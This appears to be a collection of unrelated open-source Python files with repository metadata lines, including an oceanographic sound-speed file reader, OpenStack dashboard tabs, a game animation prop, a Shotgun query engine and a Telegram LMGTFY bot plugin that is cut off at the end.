S41 P,T,S,a D(P,T,S,L),c(P,T,S,L),a
S42 P,T,S D(P,T,S,L),c(P,T,S,L),a(P,T,S,L)
S43 P,T,S,a,f D(P,T,S,L),c(P,T,S,L),a Frequency dependent
S50 P,T,C D(P,T,C,L),c(P,T,C,L)
S51 P,T,C,a D(P,T,C,L),c(P,T,C,L),a
S52 P,T,C D(P,T,C,L),c(P,T,C,L),a(P,T,C,L)
S53 P,T,C,a,f D(P,T,C,L),c(P,T,C,L),a Frequency dependent
'''
SSP_Formats = {}
for fmt in ssp_fmts_doc.splitlines():
m = re.match(r'\s*(?P<fmt>S\d\d)\s*(?P<fields>[\w,]*)\s', fmt)
if m:
        SSP_Formats[m.group('fmt')] = [
            t.replace('a', 'absorption').replace('c', 'soundspeed').replace('f', 'frequency')
             .replace('D', 'depth').replace('T', 'temperature').replace('S', 'salinity')
            for t in m.group('fields').split(',')]
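# For reference, this expands e.g. SSP_Formats['S10'] to ['depth', 'soundspeed'] and
# SSP_Formats['S22'] to ['depth', 'temperature', 'salinity'] (taken from the second
# column of ssp_fmts_doc above).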
class Simrad(AbstractTextReader):
"""Simrad reader -> CTD style
"""
def __init__(self):
super(Simrad, self).__init__()
self.desc = "Simrad"
self._ext.add('ssp')
self._ext.add('s??')
def read(self, data_path, settings, callbacks=CliCallbacks(), progress=None):
logger.debug('*** %s ***: start' % self.driver)
self.s = settings
self.cb = callbacks
self.init_data() # create a new empty profile list
self._read(data_path=data_path)
self._parse_header()
self._parse_body()
# initialize probe/sensor type
self.ssp.cur.meta.sensor_type = Dicts.sensor_types['CTD']
self.ssp.cur.meta.probe_type = Dicts.probe_types['Simrad']
self.fix()
self.finalize()
logger.debug('*** %s ***: done' % self.driver)
return True
def _parse_header(self):
meta = {}
m = re.search(r'''\$[A-Z][A-Z](?P<fmt>S\d\d), #fmt is between 00 and 53
(?P<id>\d+),
(?P<nmeasure>\d+),
(?P<hour>\d\d)(?P<minute>\d\d)(?P<second>\d\d),
(?P<day>\d\d),
(?P<mon>\d\d),
(?P<yr>\d+),
''', self.lines[0], re.VERBOSE) # ignoring the optional fields of first line
if m:
meta.update(getMetaFromTimeRE(m))
meta['DataSetID'] = m.group('id')
meta['Format'] = "SSP " + m.group('fmt')
meta['fmt'] = m.group('fmt')
m = re.search(r'''(?P<lat>[\d.]+,[NS]),
(?P<lon>[\d.]+,[EW]),
''', self.lines[1], re.VERBOSE) # try the optional second line
if not m:
m = re.search(r'''(?P<lat>[\d.]+,[NS]),
(?P<lon>[\d.]+,[EW]),
''', self.lines[-1], re.VERBOSE) # try at the end of file
if m:
location = coordinates.Coordinate(m.group('lat'), m.group('lon'))
meta.update(Profile.getMetaFromCoord(location))
meta['filename'] = self.fid._path
self.rawmeta = meta
def _parse_body(self):
"""
' Simrad SSP format (See EM Series 1002 Operator Manual for details):
' Start ID, $ item 1
' Talker ID AA
' Datagram ID, S10,
' Data Set ID, xxxxx, item 2
' Number of measurements, xxxx, item 3
' UTC time of data acquisition, hhmmss, item 4
' Day of data acquisition, xx, item 5
' Month of data acquisition, xx, item 6
' Year of data acquisition, xxxx, item 7
' First good depth in m x.x,
' Corresponding Sound Velocity in m/s, x.x,
' Skip temp, sal, absorption coeff fields ,,,
' End of line CRLF
' Then, repeat good depth, sv,,,,CRLF until all NPTS are listed.
From the Simrad Datagrams docs:
Data Description Format Length Valid range Note
Start identifier = $ Always 24h 1
Talker identifier aa 2 Capital letters
        Datagram identifier Always Sxx, 4 S00 to S53 1,2
Data set identifier xxxxx, 6 00000 to 65535
Number of measurements = N xxxx, 5 0001 to 9999 9
UTC time of data acquisition hhmmss, 7 000000 to 235959 3
Day of data acquisition xx, 3 00 to 31 3
Month of data acquisition xx, 3 00 to 12 3
Year of data acquisition xxxx, 5 0000 to 9999 3
N entries of the next 5 fields See note 4
        Depth in m from water level or
        Pressure in MPa                           x.x,      2    0 to 12000.00 or 0 to 1.0000    4
        Sound velocity in m/s                     x.x,      1    1400 to 1700.00
        Temperature in °C                         x.x,      1    5 to 45.00
        Salinity in parts per thousand or
        Conductivity in S/m                       x.x,      1    0 to 45.00 or 0 to 7.000
        Absorption coefficient in dB/km           x.x       0    0 to 200.00                     5
        Data set delimiter                        CRLF      2    0Dh 0Ah
        End of repeat cycle
        Latitude in degrees and minutes, plus
        optional decimal minutes                  llll.ll,  Variable 5    0000 to 9000.0...      6
        Latitude N/S                              a,        2    N or S                          6
        Longitude in degrees and minutes, plus
        optional decimal minutes                  yyyyy.yy, Variable 6    00000 to 18000.0...    6
        Longitude E/W                             a,        2    E or W                          6
Atmospheric pressure in MPa x.x, 1 0 to 1.0000 6
Frequency in Hz xxxxxx, Variable 7
User given comments c c Variable 6
Optional checksum *hh 8
End of datagram delimiter = \CRLF 5Ch 0Dh 0Ah 3
Note:
1 The datagram identifier identifies what type of data is
included. This is shown in the following table where D is
depth, P is pressure, S is salinity, C is conductivity, c is
soundspeed, 'a' is absorption coefficient, f is frequency and
L is latitude. The notation c(T,S) indicates for example that
the soundspeed is to be calculated from the temperature and
salinity input data. When pressure is used, the atmospheric
pressure must be given if the pressure is absolute, otherwise
the pressure must be given re the sea level and the
atmospheric pressure must be zero.
See top of module ssp_fmts_doc for format specifiers.
"""
metadata = self.rawmeta
# read any of the above formats
profile_data = parseNumbers(self.lines,
[(n, numpy.float32) for n in SSP_Formats[metadata['fmt']]],
r"\s*,\s*", pre=r'^\s*', post=r'[,.\s\d]*$', ftype='SSP')
p = Profile(profile_data, ymetric="depth", attribute="soundspeed", metadata=metadata)
self.ssp.append_profile(p.ConvertToSoundSpeedProfile())
| hydroffice/hyo_soundspeed | hyo2/soundspeed/formats/readers/simrad.py | Python | lgpl-2.1 | 8,879 |
# -*- coding: utf-8 -*-
"""
Created on Mon May 23 13:15:10 2016
@author: nn31
"""
import pandas as pd
import pickle
import re
import numpy as np
#read in cmmi data
cmmi = pd.read_csv("/Volumes/DCCRP_projects/CMMI/data/QDACT 05-03-2016.csv",
parse_dates=['AssessmentDate','AdmissionDate','DischargeDate','PalliativeDischargeDate'])
dd = pickle.load(open("/Users/nn31/Dropbox/40-githubRrepos/qdact-basic-analysis/notebooks/python_scripts/02_data_dictionary_dict.p", "rb" ))
variables = list(dd.keys())
variables.sort()
pattern = r'\b' + re.escape('ESAS')
symptoms = [variables[i] for i, x in enumerate(variables) if re.search(pattern, x)]
cmmi[symptoms[1]].unique()
###############################################################
#Build the Moderate / Severe Algorithm
###############################################################
inputt =list([str(i)] for i in range(0,11))
target = ['Mild','Mild','Mild','Mild','Moderate/Severe','Moderate/Severe','Moderate/Severe','Moderate/Severe','Moderate/Severe','Moderate/Severe','Moderate/Severe']
from sklearn import tree
clf = tree.DecisionTreeClassifier()
clf2 = clf.fit(inputt,target)
pickle.dump(clf2,open('/Users/nn31/Dropbox/40-githubRrepos/qdact-basic-analysis/notebooks/python_scripts/qdact_computable_phenotypes/model_objects/mod_sev_symptoms.p','wb'))
###############################################################
#Build the type of medication algorithm
###############################################################
#listt = ['1,210,012,050','1,207,512,100',np.float('nan'),'120,259,991,210,012,050','1,210,012,075','1,205,012,025','120,751,202,512,100','1,210,012,125','120,251,207,512,100','120,251,205,012,075']
| benneely/qdact-basic-analysis | notebooks/python_scripts/06_phenotype_algorithms.py | Python | gpl-3.0 | 1,722 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.utils.translation import ugettext_lazy as _ # noqa
from horizon import messages
from horizon import tabs
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.stacks \
import api as project_api
from openstack_dashboard.dashboards.project.stacks \
import tables as project_tables
LOG = logging.getLogger(__name__)
class StackTopologyTab(tabs.Tab):
name = _("Topology")
slug = "topology"
template_name = "project/stacks/_detail_topology.html"
preload = False
def get_context_data(self, request):
context = {}
stack = self.tab_group.kwargs['stack']
context['stack_id'] = stack.id
context['d3_data'] = project_api.d3_data(request, stack_id=stack.id)
return context
class StackOverviewTab(tabs.Tab):
name = _("Overview")
slug = "overview"
template_name = "project/stacks/_detail_overview.html"
def get_context_data(self, request):
return {"stack": self.tab_group.kwargs['stack']}
class ResourceOverviewTab(tabs.Tab):
name = _("Overview")
slug = "resource_overview"
template_name = "project/stacks/_resource_overview.html"
def get_context_data(self, request):
return {
"resource": self.tab_group.kwargs['resource'],
"metadata": self.tab_group.kwargs['metadata']}
class StackEventsTab(tabs.Tab):
name = _("Events")
slug = "events"
template_name = "project/stacks/_detail_events.html"
preload = False
def get_context_data(self, request):
stack = self.tab_group.kwargs['stack']
try:
stack_identifier = '%s/%s' % (stack.stack_name, stack.id)
events = api.heat.events_list(self.request, stack_identifier)
LOG.debug('got events %s' % events)
except Exception:
events = []
messages.error(request, _(
'Unable to get events for stack "%s".') % stack.stack_name)
return {"stack": stack,
"table": project_tables.EventsTable(request, data=events), }
class StackResourcesTab(tabs.Tab):
name = _("Resources")
slug = "resources"
template_name = "project/stacks/_detail_resources.html"
preload = False
def get_context_data(self, request):
stack = self.tab_group.kwargs['stack']
try:
stack_identifier = '%s/%s' % (stack.stack_name, stack.id)
resources = api.heat.resources_list(self.request, stack_identifier)
LOG.debug('got resources %s' % resources)
except Exception:
resources = []
messages.error(request, _(
'Unable to get resources for stack "%s".') % stack.stack_name)
return {"stack": stack,
"table": project_tables.ResourcesTable(
request, data=resources, stack=stack), }
class StackDetailTabs(tabs.TabGroup):
slug = "stack_details"
tabs = (StackTopologyTab, StackOverviewTab, StackResourcesTab,
StackEventsTab)
sticky = True
class ResourceDetailTabs(tabs.TabGroup):
slug = "resource_details"
tabs = (ResourceOverviewTab,)
sticky = True
| Havate/havate-openstack | proto-build/gui/horizon/Horizon_GUI/openstack_dashboard/dashboards/project/stacks/tabs.py | Python | apache-2.0 | 3,774 |
try:
from pip._internal.req import parse_requirements
except ImportError:
from pip.req import parse_requirements
from setuptools import find_packages
from setuptools import setup
def get_long_description():
with open('README.md') as readme_file:
return readme_file.read()
setup(
name='jsonapi-requests',
version='0.6.2.dev0',
description='Python client implementation for json api. http://jsonapi.org/',
long_description=get_long_description(),
long_description_content_type='text/markdown',
author='Social WiFi',
author_email='it@socialwifi.com',
url='https://github.com/socialwifi/jsonapi-requests',
packages=find_packages(exclude=['tests']),
install_requires=[str(ir.req) for ir in parse_requirements('base_requirements.txt', session=False)],
setup_requires=['pytest-runner'],
tests_require=['pytest', 'flask'],
extras_require={
'flask': ['flask']
},
license='BSD',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
]
)
| socialwifi/jsonapi-requests | setup.py | Python | bsd-3-clause | 1,500 |
from direct.actor import Actor
from direct.directnotify import DirectNotifyGlobal
from direct.interval.IntervalGlobal import Sequence, Func
from toontown.hood import InteractiveAnimatedProp
from toontown.hood import GenericAnimatedProp
from toontown.toonbase import ToontownGlobals, ToontownBattleGlobals, TTLocalizer
class MailboxInteractiveProp(InteractiveAnimatedProp.InteractiveAnimatedProp):
notify = DirectNotifyGlobal.directNotify.newCategory('MailboxInteractiveProp')
BattleCheerText = TTLocalizer.InteractivePropTrackBonusTerms[ToontownBattleGlobals.THROW_TRACK]
ZoneToIdles = {ToontownGlobals.ToontownCentral: (('tt_a_ara_ttc_mailbox_idle0',
3,
10,
'tt_a_ara_ttc_mailbox_idle0settle',
3,
10),
('tt_a_ara_ttc_mailbox_idleTake2',
1,
1,
None,
3,
10),
('tt_a_ara_ttc_mailbox_idleLook1',
1,
1,
None,
3,
10),
('tt_a_ara_ttc_mailbox_idleAwesome3',
1,
1,
None,
3,
10)),
ToontownGlobals.DonaldsDock: (('tt_a_ara_dod_mailbox_idle0',
3,
10,
'tt_a_ara_dod_mailbox_idle0settle',
3,
10),
('tt_a_ara_dod_mailbox_idle2',
1,
1,
None,
3,
10),
('tt_a_ara_dod_mailbox_idle1',
1,
1,
None,
3,
10),
('tt_a_ara_dod_mailbox_idleAwesome3',
1,
1,
None,
3,
10)),
ToontownGlobals.DaisyGardens: (('tt_a_ara_dga_mailbox_idle0',
3,
10,
'tt_a_ara_dga_mailbox_idle0settle',
3,
10),
('tt_a_ara_dga_mailbox_idleTake1',
1,
1,
None,
3,
10),
('tt_a_ara_dga_mailbox_idleLook2',
1,
1,
None,
3,
10),
('tt_a_ara_dga_mailbox_idleAwesome3',
1,
1,
None,
3,
10)),
ToontownGlobals.MinniesMelodyland: (('tt_a_ara_mml_mailbox_idle0',
3,
10,
'tt_a_ara_mml_mailbox_idle0settle',
3,
10),
('tt_a_ara_mml_mailbox_idleTake1',
1,
1,
None,
3,
10),
('tt_a_ara_mml_mailbox_idleLook2',
1,
1,
None,
3,
10),
('tt_a_ara_mml_mailbox_idleAwesome3',
1,
1,
None,
3,
10)),
ToontownGlobals.TheBrrrgh: (('tt_a_ara_tbr_mailbox_idleShiver1',
1,
1,
None,
3,
10),
('tt_a_ara_tbr_mailbox_idleSneeze2',
1,
1,
None,
3,
10),
('tt_a_ara_tbr_mailbox_idleSpin0',
1,
1,
None,
3,
10),
('tt_a_ara_tbr_mailbox_idleAwesome3',
1,
1,
None,
3,
10)),
ToontownGlobals.DonaldsDreamland: (('tt_a_ara_ddl_mailbox_idleSleep0',
3,
10,
None,
0,
0),
('tt_a_ara_ddl_mailbox_idleShake2',
1,
1,
None,
0,
0),
('tt_a_ara_ddl_mailbox_idleSnore1',
1,
1,
None,
0,
0),
('tt_a_ara_ddl_mailbox_idleAwesome3',
1,
1,
None,
0,
0))}
ZoneToIdleIntoFightAnims = {ToontownGlobals.ToontownCentral: 'tt_a_ara_ttc_mailbox_idleIntoFight',
ToontownGlobals.DonaldsDock: 'tt_a_ara_dod_mailbox_idleIntoFight',
ToontownGlobals.DaisyGardens: 'tt_a_ara_dga_mailbox_idleIntoFight',
ToontownGlobals.MinniesMelodyland: 'tt_a_ara_mml_mailbox_idleIntoFight',
ToontownGlobals.TheBrrrgh: 'tt_a_ara_tbr_mailbox_idleIntoFight',
ToontownGlobals.DonaldsDreamland: 'tt_a_ara_ddl_mailbox_idleIntoFight'}
ZoneToVictoryAnims = {ToontownGlobals.ToontownCentral: 'tt_a_ara_ttc_mailbox_victoryDance',
ToontownGlobals.DonaldsDock: 'tt_a_ara_dod_mailbox_victoryDance',
ToontownGlobals.DaisyGardens: 'tt_a_ara_dga_mailbox_victoryDance',
ToontownGlobals.MinniesMelodyland: 'tt_a_ara_mml_mailbox_victoryDance',
ToontownGlobals.TheBrrrgh: 'tt_a_ara_tbr_mailbox_victoryDance',
ToontownGlobals.DonaldsDreamland: 'tt_a_ara_ddl_mailbox_victoryDance'}
ZoneToSadAnims = {ToontownGlobals.ToontownCentral: 'tt_a_ara_ttc_mailbox_fightSad',
ToontownGlobals.DonaldsDock: 'tt_a_ara_dod_mailbox_fightSad',
ToontownGlobals.DaisyGardens: 'tt_a_ara_dga_mailbox_fightSad',
ToontownGlobals.MinniesMelodyland: 'tt_a_ara_mml_mailbox_fightSad',
ToontownGlobals.TheBrrrgh: 'tt_a_ara_tbr_mailbox_fightSad',
ToontownGlobals.DonaldsDreamland: 'tt_a_ara_ddl_mailbox_fightSad'}
ZoneToFightAnims = {ToontownGlobals.ToontownCentral: ('tt_a_ara_ttc_mailbox_fightBoost', 'tt_a_ara_ttc_mailbox_fightCheer', 'tt_a_ara_ttc_mailbox_fightIdle'),
ToontownGlobals.DonaldsDock: ('tt_a_ara_dod_mailbox_fightBoost', 'tt_a_ara_dod_mailbox_fightCheer', 'tt_a_ara_dod_mailbox_fightIdle'),
ToontownGlobals.DaisyGardens: ('tt_a_ara_dga_mailbox_fightBoost', 'tt_a_ara_dga_mailbox_fightCheer', 'tt_a_ara_dga_mailbox_fightIdle'),
ToontownGlobals.MinniesMelodyland: ('tt_a_ara_mml_mailbox_fightBoost', 'tt_a_ara_mml_mailbox_fightCheer', 'tt_a_ara_mml_mailbox_fightIdle'),
ToontownGlobals.TheBrrrgh: ('tt_a_ara_tbr_mailbox_fightBoost', 'tt_a_ara_tbr_mailbox_fightCheer', 'tt_a_ara_tbr_mailbox_fightIdle'),
ToontownGlobals.DonaldsDreamland: ('tt_a_ara_ddl_mailbox_fightBoost', 'tt_a_ara_ddl_mailbox_fightCheer', 'tt_a_ara_ddl_mailbox_fightIdle')}
IdlePauseTime = base.config.GetFloat('prop-idle-pause-time', 0.0)
def __init__(self, node):
InteractiveAnimatedProp.InteractiveAnimatedProp.__init__(self, node, ToontownGlobals.MAILBOXES_BUFF_BATTLES)
def setupActor(self, node):
self.pieActor = Actor.Actor('phase_5/models/char/tt_r_prp_ext_piePackage', {'fightBoost': 'phase_5/models/char/tt_a_prp_ext_piePackage_fightBoost'})
self.pieActor.reparentTo(self.node)
self.pieActor.hide()
InteractiveAnimatedProp.InteractiveAnimatedProp.setupActor(self, node)
def hasSpecialIval(self, origAnimName):
result = False
if 'fightBoost' in origAnimName:
result = True
return result
def getSpecialIval(self, origAnimName):
result = Sequence()
if 'fightBoost' in origAnimName:
result.append(Func(self.pieActor.show))
result.append(self.pieActor.actorInterval('fightBoost'))
result.append(Func(self.pieActor.hide))
return result
| ksmit799/Toontown-Source | toontown/hood/MailboxInteractiveProp.py | Python | mit | 10,805 |
from telebot import types
from tululbot.utils import TululBot
class TestTululBot:
def test_user_property(self, mocker, fake_user):
bot = TululBot('TOKEN')
mock_get_me = mocker.patch.object(bot, 'get_me', autospec=True,
return_value=fake_user)
rv = bot.user
assert rv == fake_user
mock_get_me.assert_called_once_with()
def test_create_is_reply_to_filter(self, mocker, fake_message_dict, fake_user_dict):
fake_replied_message_dict = fake_message_dict.copy()
fake_message = types.Message.de_json(fake_message_dict)
fake_replied_message = types.Message.de_json(fake_replied_message_dict)
bot_user = types.User.de_json(fake_user_dict)
bot_message = 'Message text from bot goes here'
fake_replied_message.text = bot_message
fake_replied_message.from_user = bot_user
fake_message.reply_to_message = fake_replied_message
bot = TululBot('TOKEN')
bot.user = bot_user
assert bot.create_is_reply_to_filter(bot_message)(fake_message)
assert not bot.create_is_reply_to_filter('foo bar')(fake_message)
| tulul/tululbot | tests/test_utils.py | Python | apache-2.0 | 1,184 |
# Copyright (c) 2013, Nathan Dunsworth - NFXPlugins
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the NFXPlugins nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL NFXPLUGINS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
__all__ = [
'SgQueryEngine'
]
# Python imports
import threading
import weakref
# This module imports
import ShotgunORM
class SgQueryJob(object):
'''
'''
def __repr__(self):
eIds = []
for entity in self.entities():
e = entity()
if e == None:
continue
eIds.append(e.id)
return '<%s(type:%s, fields:%s, entities:%s)>' % (
type(self).__name__,
self.entityType(),
self.fields(),
eIds
)
def __lt__(self, item):
return self.fields() < item.fields()
def __gt__(self, item):
return self.fields() > item.fields()
def __eq__(self, item):
return self.fields() == item.fields()
def __init__(self, sgEntityType, sgEntities, sgFields):
self._entityType = sgEntityType
self._entities = set(sgEntities)
self._fields = set(sgFields)
def fields(self):
return self._fields
def entities(self):
return self._entities
def entityType(self):
return self._entityType
class SgQueryEngine(object):
'''
Class that represents an asynchronous Entity field value pulling engine.
'''
def __del__(self):
try:
self.shutdown()
except:
pass
def __enter__(self):
self.__lock.acquire()
def __exit__(self, exc_type, exc_value, traceback):
self.__lock.release()
return False
def __repr__(self):
connection = self.connection()
if connection == None:
return '<SgQueryEngine>'
return '<SgQueryEngine(url:"%(url)s", script:"%(script)s">' % {
'url': connection.url(),
'script': connection.scriptName()
}
def __init__(self, sgConnection):
self.__lock = threading.Lock()
self.__block = threading.RLock()
self._qEvent = threading.Event()
self._qShutdownEvent = threading.Event()
self._qEvent.clear()
self.__connection = weakref.ref(sgConnection)
self._pendingQueries = []
self._entityQueue = {}
self.__engineThread = threading.Thread(
name=self.__repr__(),
target=SgQueryEngineWorker,
args = [
self.__connection,
self.__lock,
self.__block,
self._qEvent,
self._qShutdownEvent,
self._entityQueue,
self._pendingQueries
]
)
self.__engineThread.setDaemon(True)
def addQueue(self, sgEntity, sgFields):
'''
Adds the passed Entity and the specified fields to the queue.
'''
    # The field pull queue works by taking the fields that each Entity is asking
    # to pull and batching them into like groups, minimizing the number of
    # passes the Shotgun database needs to make to return each Entity type.
    #
    # Each time a new batch is added the currently pending pulls are locked and
    # checked to see if the new batch items can be added to them. This means a
    # late addition may return quicker than another item that was added to the
    # queue earlier, simply because it is requesting a set of fields that are
    # lower in the queue.
#
# Example 1:
#
# * ENTITY: FIELDS PULLING *
# Entity A: ['firstname', 'lastname']
# Entity B: ['firstname', 'lastname', 'created_by']
    #   Entity C: ['firstname', 'lastname', 'created_by', 'created_at']
#
# * BATCH: ENTITIES, FIELDS PULLING *
# Batch1: [A, B, C], ['firstname', 'lastname']
# Batch2: [B, C], ['created_by']
# Batch3: [C], ['created_at']
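    #
    # When the worker processes these, each batch above becomes a single
    # Shotgun find() call, e.g. Batch1 pulls only 'firstname' and 'lastname'
    # for the ids of A, B and C in one request.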
if not isinstance(sgEntity, ShotgunORM.SgEntity):
raise TypeError('expected an SgEntity got %s' % sgEntity)
if not self.__engineThread.isAlive():
raise RuntimeError('engine thread is not running')
try:
undoFields = []
pullFields = []
sgFields = set(sgFields)
for name, field in sgEntity.fields(sgFields).items():
pullFields.append(name)
        # Mark the field as updating (its update event is cleared here).
field._SgField__isUpdatingEvent.clear()
undoFields.append(field)
if len(pullFields) <= 0:
return
ShotgunORM.LoggerQueryEngine.debug('%(qEng)s.addQueue(...)', {'qEng': self})
ShotgunORM.LoggerQueryEngine.debug(' * sgEntity: %(sgEntity)s', {'sgEntity': sgEntity})
ShotgunORM.LoggerQueryEngine.debug(' * sgFields: %(sgFields)s', {'sgFields': pullFields})
with self:
pullFields = set(pullFields)
eq = None
t = sgEntity.type
if self._entityQueue.has_key(t):
eq = self._entityQueue[t]
else:
eq = []
self._entityQueue[t] = eq
valid = False
eqLen = len(eq)
if eqLen <= 0:
# Weakref the Entity, this allows the Engine to not keep Entities
# around.
entities = [weakref.ref(sgEntity)]
q = SgQueryJob(t, entities, pullFields)
eq.append(q)
self._pendingQueries.append(q)
valid = True
elif eqLen == 1:
          # This check sees if the queue for this Entity type contains only a
          # single Entity and, if so, whether that Entity is the one currently
          # being processed. If it is, the job's fields are merged with the
          # current list of fields for the Entity.
q = eq[0]
qEntities = q.entities()
if len(qEntities) == 1:
qEntity = list(qEntities)[0]()
if qEntity == sgEntity:
q.fields().update(pullFields)
valid = True
if not valid:
for q in eq:
qFields = q.fields()
            # Skip when the current batch has more fields to query than the
# Entity is asking for.
if len(pullFields) < len(qFields):
continue
sharedFields = pullFields & qFields
if len(sharedFields) >= 1:
q.entities().add(
weakref.ref(sgEntity)
)
pullFields -= sharedFields
# Halt if all fields have been queued up!
if len(pullFields) <= 0:
break
if len(pullFields) >= 1:
entities = [weakref.ref(sgEntity)]
q = SgQueryJob(t, entities, pullFields)
eq.append(q)
self._pendingQueries.append(q)
# Un-lock the engine if the q was empty.
# if not self._qEvent.isSet():
self._qEvent.set()
# Sort the field q list so that the largest queries are first.
eq.sort(reverse=True)
except Exception, e:
ShotgunORM.LoggerQueryEngine.error(e)
for field in undoFields:
field._SgField__isUpdatingEvent.set()
raise
def block(self):
'''
Blocks the query engine.
    This allows multiple Entities to be batch added and prevents the engine
    from prematurely processing results.
    Note:
      You must always make sure to call unblock() after you are finished adding
      items to the queue. Even if your code raises an exception you must not
      forget to unblock the engine.
'''
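    # A minimal usage sketch (the names below are illustrative, not part of
    # this module's API):
    #
    #   engine.block()
    #   try:
    #     for entity in my_entities:
    #       engine.addQueue(entity, ['code', 'description'])
    #   finally:
    #     engine.unblock()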
self.__block.acquire()
def connection(self):
'''
Returns the connection the engine belongs to.
'''
return self.__connection()
def isBlocking(self):
'''
Returns True if the engine is currently blocking.
'''
return self.__block._is_owned()
def pending(self):
'''
Returns the number of pending queries.
'''
return len(self._pendingQueries)
def shutdown(self):
'''
Shutdown the engine.
'''
if self.__engineThread.isAlive():
self._qEvent.set()
self._qShutdownEvent.wait()
def start(self):
'''
Starts the engines background thread.
'''
self.__engineThread.start()
def unblock(self):
'''
Un-blocks the query engine.
Note:
This must always be called after blocking the engine.
'''
self.__block.release()
def SgQueryEngineWorker(
connection,
lock,
block,
event,
eventShutdown,
entityQueue,
pendingQueries
):
##############################################################################
#
# IMPORTANT!!!!!
#
  # You must make sure to delete any variable that is created which points to
  # an Entity object. Otherwise the worker won't let it fall out of scope and
  # this will prevent the Entity from being gc'd.
#
##############################################################################
while True:
entityType = None
entityFields = None
entities = None
event.wait()
if len(pendingQueries) <= 0:
try:
ShotgunORM.LoggerQueryEngine.debug(
'Stopping because engine set event and pendingQueries size is zero'
)
except:
pass
eventShutdown.set()
return
with block:
q = pendingQueries.pop(0)
qSize = len(pendingQueries) + 1
ShotgunORM.LoggerQueryEngine.debug('Queue: job 1 of %(size)d', {'size': qSize})
with lock:
if len(pendingQueries) <= 0:
event.clear()
entityType = q.entityType()
entityFields = list(q.fields())
entities = list(q.entities())
entityQueue[entityType].remove(q)
ShotgunORM.LoggerQueryEngine.debug('Preparing to process job %(q)s', {'q': q})
entityList = {}
entityIds = []
for i in entities:
entity = i()
# Check it was gc'd!
if entity == None:
continue
try:
entityList[entity['id']] = entity
entityIds.append(entity['id'])
finally:
del entity
# Bail if all the Entities were gc'd!
if len(entityList) <= 0:
ShotgunORM.LoggerQueryEngine.debug('Skipping job all Entities no longer exist')
continue
ShotgunORM.LoggerQueryEngine.debug(' * Processing')
con = connection()
if con == None:
try:
ShotgunORM.LoggerQueryEngine.debug(
' * Stopping because connection not found'
)
except:
pass
return
try:
ShotgunORM.LoggerQueryEngine.debug(' * Searching')
sgSearch = None
if len(entityIds) == 1:
sgSearch = con._sg_find(entityType, [['id', 'is', entityIds[0]]], entityFields)
else:
sgSearch = con._sg_find(entityType, [['id', 'in', entityIds]], entityFields)
ShotgunORM.LoggerQueryEngine.debug(' * Searching complete!')
except Exception, e:
ShotgunORM.LoggerQueryEngine.error(e)
for entity in entityList.values():
for field in entity.fields(entityFields).values():
field._SgField__isUpdatingEvent.set()
del entity
del entityList
continue
finally:
del con
for result in sgSearch:
entity = entityList[result['id']]
del result['type']
try:
for fieldName, field in entity.fields(entityFields).items():
field.setSyncUpdate(result[fieldName])
field._SgField__isUpdatingEvent.set()
finally:
del entity
del entityList
eventShutdown.set()
try:
ShotgunORM.LoggerQueryEngine.debug(' * Processing complete!')
except:
pass
| ndunsworth/python-shotgunorm | ShotgunORM/SgQueryEngine.py | Python | bsd-3-clause | 12,533 |
class NotFound(Exception):
"""
    This Exception should be raised when the user queries an API and gets a
404 response.
"""
pass
class MultipleItemsReturned(Exception):
"""
    This Exception should be raised when the user queries an API for one
Resource, but more than one are returned.
"""
pass
class ValidationError(Exception):
"""
This Exception should be raised when a Jason Model fails validation.
"""
pass
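# Illustrative (hypothetical) client-side usage of these exceptions:
#
#   if response.status_code == 404:
#       raise NotFound(url)
#   if len(items) > 1:
#       raise MultipleItemsReturned(url)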
| sourcelair/jason | jason/exceptions.py | Python | mit | 469 |
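# Plugin that turns a query into a "Let Me Google That For You" link.
# The long lmgtfy.com URL is shortened via the r1z.ir API before being sent
# back to the chat, both for the /lmgtfy command and for inline queries.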
def lmgtfy(message):
m = bot.send_message(message.chat.id, "Please send the query you want to be LMGTFY'ed in your next message")
zigzag.nextstep(m, "lmgtfyquery")
def lmgtfyquery(message):
textl = message.text.replace("/lmgtfy ","", 1).replace("/Lmgtfy ", "", 1).replace("+","%2B")
rez = urllib.urlopen("http://r1z.ir/api.php?long=http://lmgtfy.com/?q={}".format(textl)).read()
bot.send_message(message.chat.id, "Direct link: `{}`\n\nOr [Click on this]({})".format(rez,rez), parse_mode="Markdown", disable_web_page_preview=True)
def inlinelmgtfy(query):
if query.query == "lmgtfy":
